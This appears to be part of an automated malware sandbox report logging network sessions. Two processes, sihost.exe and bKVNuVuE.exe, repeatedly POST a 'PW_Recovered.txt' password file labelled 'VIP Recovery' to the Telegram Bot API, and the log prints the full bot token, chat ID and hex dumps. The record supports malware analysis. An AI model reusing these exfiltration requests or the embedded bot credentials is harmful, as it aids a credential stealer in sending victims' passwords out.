                                    2024-08-13 18:25:49 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 39 32 39 65 62 32 31 33 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 34 34 20 50 4d
                                    Data Ascii: --------------------------8dcbd929eb213d3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:44 PM
                                    2024-08-13 18:25:50 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:50 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:50 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1364,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.2249206149.154.167.2204433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:51 UTC343OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbd9b00a4d486
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    2024-08-13 18:25:51 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 39 62 30 30 61 34 64 34 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 34 34 20 50 4d
                                    Data Ascii: --------------------------8dcbd9b00a4d486Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:44 PM
                                    2024-08-13 18:25:52 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:51 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:52 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1365,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    24192.168.2.2249209149.154.167.2204433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:54 UTC367OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbdfb6c102920
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:54 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 66 62 36 63 31 30 32 39 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 35 36 20 50 4d
                                    Data Ascii: --------------------------8dcbdfb6c102920Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:56 PM
                                    2024-08-13 18:25:54 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:54 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:54 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1366,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    25192.168.2.2249210149.154.167.2204433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:55 UTC367OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbdac5db5126d
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:55 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 61 63 35 64 62 35 31 32 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 34 34 20 50 4d
                                    Data Ascii: --------------------------8dcbdac5db5126dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:44 PM
                                    2024-08-13 18:25:55 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:55 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:55 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1367,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    26192.168.2.2249212149.154.167.2204433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:56 UTC343OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbe0c6bb89c78
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    2024-08-13 18:25:56 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 65 30 63 36 62 62 38 39 63 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 35 36 20 50 4d
                                    Data Ascii: --------------------------8dcbe0c6bb89c78Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:56 PM
                                    2024-08-13 18:25:57 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:57 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:57 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1368,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    27192.168.2.2249215149.154.167.2204433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:57 UTC343OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbe27325b2ebc
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    2024-08-13 18:25:57 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 65 32 37 33 32 35 62 32 65 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 35 36 20 50 4d
                                    Data Ascii: --------------------------8dcbe27325b2ebcContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:56 PM
                                    2024-08-13 18:25:58 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:58 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:58 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1369,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    28192.168.2.2249216149.154.167.2204433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:58 UTC367OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbdc0151008be
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:58 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 63 30 31 35 31 30 30 38 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 34 34 20 50 4d
                                    Data Ascii: --------------------------8dcbdc0151008beContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:44 PM
                                    2024-08-13 18:25:59 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:58 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:59 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1370,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    29192.168.2.2249218149.154.167.2204433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:26:00 UTC367OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbddc7e4bd5e0
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    Connection: Keep-Alive
